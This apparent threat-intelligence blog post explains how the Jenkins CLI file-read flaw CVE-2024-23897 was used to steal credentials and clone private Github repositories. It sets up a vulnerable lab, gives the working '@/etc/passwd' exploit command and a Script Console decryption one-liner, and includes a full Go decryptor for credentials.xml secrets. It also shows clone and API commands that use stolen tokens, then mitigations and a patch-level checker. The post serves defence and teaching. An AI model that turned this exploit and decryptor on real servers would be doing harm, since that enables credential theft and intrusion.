This blog details how CVE-2024-23897, a Local File Inclusion (LFI) vulnerability in Jenkins, was exploited to breach Github repositories. Attackers accessed sensitive files, decrypted credentials, and used them to infiltrate private repositories. The article underscores the need for timely patching, strong authentication, and regular security audits to mitigate such threats.
Category: Adversary Intelligence
Region: Global
Date: 24 July 2024
TLP: GREEN
This article delves into the technical intricacies of CVE-2024-23897, an unauthenticated Local File Inclusion (LFI) vulnerability in Jenkins, and retraces how threat actors leveraged it to breach a company's Github repositories.
Our story begins with a seemingly innocuous Jenkins server, a cornerstone of continuous integration and deployment pipelines. Unfortunately, this particular instance was running a vulnerable version (Jenkins 2.441 and earlier, or LTS 2.426.2 and earlier) and recently became a target of threat actors.
To understand the attack, let's first set up a similar vulnerable environment using Docker:
1. Pull Docker image using the command:
docker pull jenkins/jenkins:2.440-jdk17
2. Run the container:
docker run -d --name jenkins -p 8080:8080 -p 50000:50000 -v /path/to/your/local/jenkins/home:/var/jenkins_home jenkins/jenkins:2.440-jdk17
This command launches a Jenkins container named jenkins, maps port 8080 (web UI and CLI endpoint) and port 50000 (inbound agents) to the host machine, and mounts a local directory as the container's /var/jenkins_home, the JENKINS_HOME in which credentials.xml and the secrets/ directory will be written.
3. Access the container's shell (the container was named jenkins in step 2):
docker exec -it jenkins /bin/bash
With the stage set, let's explore how threat actors are exploiting the vulnerability.
CVE-2024-23897 is an unauthenticated LFI vulnerability that allows attackers to read arbitrary files on the Jenkins controller. The flaw is not in a web parameter but in the Jenkins CLI: its command parser (the args4j library) expands any argument of the form @/path into the contents of that file on the server, and Jenkins left that feature enabled for commands sent to the CLI endpoint. Attackers with Overall/Read permission can read entire files; attackers without it can still read the first few lines of any file, depending on which CLI command they use, because the lines surface in the parser's error messages.
Threat actors targeted the credentials.xml file, which stores the encrypted credentials Jenkins uses for its various integrations. Reading it through the LFI and decrypting its contents gave them access to Github SSH keys and access tokens.
Let's delve into the technical details of how IntelBroker exploited the LFI and exfiltrated the Github credentials:
IntelBroker most likely used the Jenkins CLI client together with the @-file expansion to read sensitive files. For instance, to read the first line of /etc/passwd:
java -jar jenkins-cli.jar -s http://target-jenkins-server:8080/ version @/etc/passwd
The CLI's -auth @file option, sometimes seen in the same command, reads the attacker's own username:password from a local file rather than anything on the server, so it plays no part in the exploit; reaching the CLI endpoint anonymously is enough.
The @ prefix is the trigger: the args4j parser behind the CLI replaces an argument of the form @/path with the lines of that file, read on the Jenkins controller, one argument per line. A command such as version accepts no arguments, so the parser rejects the first surplus argument and echoes it back in its error message (No argument is allowed: root:x:0:0:...), leaking the first line of the file. Commands that accept several arguments leak more lines, and with Overall/Read permission entire files can be recovered, with some limitations for binary content.
Note: POC scripts for CVE-2024-23897 are also available on github.
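To make the mechanism concrete, the following Go program is an added example (not code from the original post, from Jenkins or from args4j) that models the @-file expansion on a constructed stand-in for /etc/passwd. expandAtFiles and runVersion are hypothetical names, the error strings are modelled on args4j's messages, and the allowAtSyntax=false branch stands in for the Jenkins 2.442 / LTS 2.426.3 fix, which simply disables this parser feature.

```go
package main

import (
	"bufio"
	"fmt"
	"os"
	"path/filepath"
	"strings"
)

// expandAtFiles models the args4j behaviour behind CVE-2024-23897: an argument
// of the form "@/path" is replaced by the lines of that file, one argument per
// line, read on the Jenkins controller. The fixed releases amount to running
// with allowAtSyntax=false, which leaves "@..." as a literal argument.
func expandAtFiles(args []string, allowAtSyntax bool) ([]string, error) {
	if !allowAtSyntax {
		return args, nil
	}
	var out []string
	for _, a := range args {
		if !strings.HasPrefix(a, "@") {
			out = append(out, a)
			continue
		}
		f, err := os.Open(a[1:])
		if err != nil {
			// args4j names the missing path in its error, a file-existence oracle
			return nil, fmt.Errorf("No such file: %s", a[1:])
		}
		sc := bufio.NewScanner(f)
		for sc.Scan() {
			out = append(out, sc.Text())
		}
		f.Close()
		if err := sc.Err(); err != nil {
			return nil, err
		}
	}
	return out, nil
}

// runVersion models a CLI command that takes no arguments, like "version": the
// parser rejects the first surplus argument and echoes it in the error message,
// which is how the first line of the target file reaches an unauthenticated caller.
func runVersion(args []string, allowAtSyntax bool) (string, error) {
	expanded, err := expandAtFiles(args, allowAtSyntax)
	if err != nil {
		return "", err
	}
	if len(expanded) > 0 {
		return "", fmt.Errorf("No argument is allowed: %s", expanded[0])
	}
	return "2.440", nil
}

func main() {
	dir, err := os.MkdirTemp("", "at-syntax")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	// constructed stand-in for /etc/passwd; only its first line can leak via "version"
	target := filepath.Join(dir, "passwd")
	os.WriteFile(target, []byte("root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n"), 0o600)
	for _, allow := range []bool{true, false} {
		_, err := runVersion([]string{"@" + target}, allow)
		fmt.Printf("@-syntax enabled=%v -> %v\n", allow, err)
	}
}
```

Run it and compare the two lines of output: with the syntax enabled the error carries the first line of the target file, with it disabled the error only echoes the literal @/path. A command that accepts several arguments can echo several lines, which is the difference between the "first few lines" and "entire files" cases in the Jenkins advisory.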
IntelBroker most likely dumped credentials.xml with the same CLI trick or with a PoC script from github to obtain the stored encrypted credentials. In the Docker setup above the file lives at /var/jenkins_home/credentials.xml, that is $JENKINS_HOME/credentials.xml.
credentials.xml File: Jenkins stores all Global Credentials in encrypted form in this file. The stored value is not a hash but an AES-encrypted secret (base64 between braces), and Jenkins itself turns it back into plaintext with hudson.util.Secret.decrypt(), using the key kept in $JENKINS_HOME/secrets/hudson.util.Secret, which is in turn encrypted with $JENKINS_HOME/secrets/master.key.
Once they had the credentials.xml file, the threat actors could decrypt its secrets. On an instance where they also hold Overall/Administer, the Jenkins Script Console does it in one line:
println(hudson.util.Secret.fromString("{XXX=}").getPlainText())
Replacing {XXX=} with the encrypted string from the credentials.xml file returns the plaintext Github credentials. The Script Console is admin-only, however, so an attacker armed with nothing but the LFI instead reads $JENKINS_HOME/secrets/master.key and $JENKINS_HOME/secrets/hudson.util.Secret through the same bug and decrypts the values offline, which is what the publicly available decryptor scripts implement.
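The offline route, as an added example written for this article rather than code from the original post or from Jenkins: a Go program that derives the key the way hudson.Util.toAes128Key and the default ConfidentialStore do (SHA-256 of the master.key text truncated to 128 bits, AES-ECB decryption of hudson.util.Secret, check of the ::::MAGIC:::: trailer, first 16 bytes of the payload as the key) and then decrypts a credentials.xml value in the current 0x01-prefixed AES-CBC layout. ConfidentialKey, DecryptSecret and BuildFixture are hypothetical names; BuildFixture generates constructed sample files in memory in place of the exfiltrated ones, and the legacy AES-ECB value format is deliberately not handled.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"encoding/base64"
	"encoding/binary"
	"errors"
	"fmt"
)

const magic = "::::MAGIC::::" // trailer Jenkins appends to a plaintext before encrypting it

func pkcs5Pad(b []byte) []byte {
	n := aes.BlockSize - len(b)%aes.BlockSize
	return append(append([]byte{}, b...), bytes.Repeat([]byte{byte(n)}, n)...)
}

func pkcs5Unpad(b []byte) ([]byte, error) {
	n := 0
	if len(b) > 0 && len(b)%aes.BlockSize == 0 {
		n = int(b[len(b)-1])
	}
	if n == 0 || n > aes.BlockSize || !bytes.Equal(b[len(b)-n:], bytes.Repeat([]byte{byte(n)}, n)) {
		return nil, errors.New("bad PKCS#5 padding")
	}
	return b[:len(b)-n], nil
}

// ecb applies the block cipher block by block: Java's bare "AES" transformation, used for hudson.util.Secret, is AES/ECB/PKCS5Padding.
func ecb(block cipher.Block, in []byte, decrypt bool) []byte {
	out := make([]byte, len(in))
	for i := 0; i+aes.BlockSize <= len(in); i += aes.BlockSize {
		if decrypt {
			block.Decrypt(out[i:], in[i:i+aes.BlockSize])
		} else {
			block.Encrypt(out[i:], in[i:i+aes.BlockSize])
		}
	}
	return out
}

// masterAESKey mirrors hudson.Util.toAes128Key: SHA-256 over the master.key text, first 16 bytes.
func masterAESKey(masterKey string) []byte {
	sum := sha256.Sum256([]byte(masterKey))
	return sum[:16]
}

// ConfidentialKey recovers the 16-byte key hudson.util.Secret encrypts with, from secrets/master.key (hex text) and secrets/hudson.util.Secret (binary).
func ConfidentialKey(masterKey string, hudsonUtilSecret []byte) ([]byte, error) {
	block, _ := aes.NewCipher(masterAESKey(masterKey)) // always a valid 16-byte key
	payload, err := pkcs5Unpad(ecb(block, hudsonUtilSecret, true))
	if err != nil || !bytes.HasSuffix(payload, []byte(magic)) || len(payload) < len(magic)+16 {
		return nil, errors.New("hudson.util.Secret did not decrypt cleanly: wrong or truncated master.key?")
	}
	return payload[:16], nil // Jenkins uses only the first 16 bytes of the 256-byte payload
}

// DecryptSecret decrypts one "{...}" credentials.xml value laid out as 0x01 | ivLen (4, big-endian) | dataLen (4, big-endian) | iv | AES-CBC ciphertext.
func DecryptSecret(key []byte, encrypted string) (string, error) {
	raw, err := base64.StdEncoding.DecodeString(string(bytes.Trim([]byte(encrypted), "{} \t\r\n")))
	if err != nil || len(raw) < 9 || raw[0] != 0x01 {
		return "", errors.New("not a base64 v1 payload (the legacy ECB layout is not handled here)")
	}
	ivLen, dataLen := int(binary.BigEndian.Uint32(raw[1:5])), int(binary.BigEndian.Uint32(raw[5:9]))
	if len(key) != 16 || ivLen != aes.BlockSize || dataLen == 0 || dataLen%aes.BlockSize != 0 || 9+ivLen+dataLen != len(raw) {
		return "", errors.New("bad key length or malformed v1 payload")
	}
	block, _ := aes.NewCipher(key)
	plain := make([]byte, dataLen)
	cipher.NewCBCDecrypter(block, raw[9:9+ivLen]).CryptBlocks(plain, raw[9+ivLen:])
	plain, err = pkcs5Unpad(plain)
	return string(plain), err
}

// BuildFixture returns constructed sample data laid out as Jenkins writes it (stand-ins for the exfiltrated files, no real key material): master.key text, hudson.util.Secret bytes, one secret.
func BuildFixture(plaintext string) (masterKey string, keyFile []byte, encrypted string) {
	masterKey = "constructed-master-key" // a real master.key holds 512 hex characters
	confidential, iv := make([]byte, 256), make([]byte, aes.BlockSize)
	rand.Read(confidential)
	rand.Read(iv)
	mblock, _ := aes.NewCipher(masterAESKey(masterKey))
	keyFile = ecb(mblock, pkcs5Pad(append(confidential, []byte(magic)...)), false)
	block, _ := aes.NewCipher(confidential[:16])
	data := pkcs5Pad([]byte(plaintext))
	ct := make([]byte, len(data))
	cipher.NewCBCEncrypter(block, iv).CryptBlocks(ct, data)
	hdr := []byte{0x01, 0, 0, 0, 0, 0, 0, 0, 0}
	binary.BigEndian.PutUint32(hdr[1:5], uint32(len(iv)))
	binary.BigEndian.PutUint32(hdr[5:9], uint32(len(ct)))
	return masterKey, keyFile, "{" + base64.StdEncoding.EncodeToString(append(append(hdr, iv...), ct...)) + "}"
}

func main() {
	mk, kf, enc := BuildFixture("ghp_constructedSampleToken") // constructed, not a real token
	key, _ := ConfidentialKey(mk, kf)
	fmt.Println(DecryptSecret(key, enc))
}
```

Feed ConfidentialKey the two files read through the LFI and DecryptSecret each braced value from credentials.xml. A failed MAGIC check means master.key or hudson.util.Secret came back wrong or incomplete, which is what to expect when the advisory's limitations on reading binary files through the CLI have bitten.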
With the stolen SSH keys and access tokens, threat actors could clone private repositories outright. Using the git clone command, with the stolen SSH key loaded into their SSH agent or with the access token embedded directly in an HTTPS URL:
git clone git@github.com:target-username/private-repo.git
Using the stolen access token in the Authorization header, they could interact with the Github API to list and download repositories:
curl -H "Authorization: token github_access_token" https://api.github.com/user/repos
IntelBroker's successful breach serves as a stark reminder of the importance of cybersecurity awareness and proactive security measures. Here are some key takeaways and mitigation strategies:
1. Patch promptly: upgrade to Jenkins 2.442 or LTS 2.426.3 (or later), which disable the CLI's @-file expansion; if you cannot upgrade immediately, disable access to the CLI as a workaround.
2. Treat an exposed instance as compromised: rotate every credential stored in credentials.xml (Github tokens, SSH keys, cloud keys) as well as the Jenkins secrets themselves, since an attacker who read secrets/master.key and secrets/hudson.util.Secret can decrypt anything encrypted with them.
3. Enforce strong authentication and least privilege: do not grant Overall/Read to anonymous users, prefer scoped, short-lived Github tokens over broad classic personal access tokens, and keep Jenkins off the public internet behind SSO or a VPN.
4. Audit regularly: review who can reach the CLI endpoint, and watch the access logs for CLI requests carrying @ arguments.
By understanding the intricacies of CVE-2024-23897 and implementing robust security practices, organizations can better protect themselves against such sophisticated attacks.
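For the patching item, a fleet check, as an added example that is not part of the original post: Jenkins announces its core version in the X-Jenkins response header (for example curl -sI http://jenkins:8080/ | grep -i x-jenkins), and this Go function classifies such a version against the fixed releases. VulnerableToCVE202423897 and parseVersion are hypothetical names, and the version strings in main are constructed samples.

```go
package main

import (
	"fmt"
	"strconv"
	"strings"
)

// Fixed releases for CVE-2024-23897. Weekly versions have two numeric components
// (2.441 and earlier affected, 2.442 fixed); LTS versions have three (2.426.2 and
// earlier affected, 2.426.3 fixed). The lines need separate thresholds: a single
// cut-off at 2.442 would flag the patched LTS 2.426.3, one at 2.426.3 would clear 2.441.
var (
	fixedWeekly = []int{2, 442}
	fixedLTS    = []int{2, 426, 3}
)

// parseVersion turns "2.426.3" (or "2.440-SNAPSHOT") into numeric components.
func parseVersion(v string) ([]int, error) {
	v = strings.TrimSpace(v)
	if i := strings.IndexAny(v, "-+ "); i >= 0 {
		v = v[:i] // drop qualifiers such as -SNAPSHOT
	}
	var nums []int
	for _, p := range strings.Split(v, ".") {
		n, err := strconv.Atoi(p)
		if err != nil {
			return nil, fmt.Errorf("unparseable Jenkins version %q", v)
		}
		nums = append(nums, n)
	}
	return nums, nil
}

// less is a component-wise version comparison.
func less(a, b []int) bool {
	for i := 0; i < len(a) && i < len(b); i++ {
		if a[i] != b[i] {
			return a[i] < b[i]
		}
	}
	return len(a) < len(b)
}

// VulnerableToCVE202423897 reports whether a Jenkins core version, as announced in
// the X-Jenkins response header, predates the fix for its own release line.
func VulnerableToCVE202423897(version string) (bool, error) {
	nums, err := parseVersion(version)
	if err != nil {
		return false, err
	}
	switch len(nums) {
	case 2:
		return less(nums, fixedWeekly), nil
	case 3:
		return less(nums, fixedLTS), nil
	default:
		return false, fmt.Errorf("unexpected version shape %q", version)
	}
}

func main() {
	// constructed sample of header values one might collect from a fleet
	for _, v := range []string{"2.440", "2.441", "2.442", "2.426.2", "2.426.3", "2.440.1", "2.414.3"} {
		vuln, err := VulnerableToCVE202423897(v)
		fmt.Printf("X-Jenkins: %-8s vulnerable=%-5v err=%v\n", v, vuln, err)
	}
}
```

The header is served on unauthenticated responses, so the check needs no credentials; a naive numeric comparison against a single threshold is the trap it avoids, because the LTS line was fixed at a number that is lower than the vulnerable weekly 2.441.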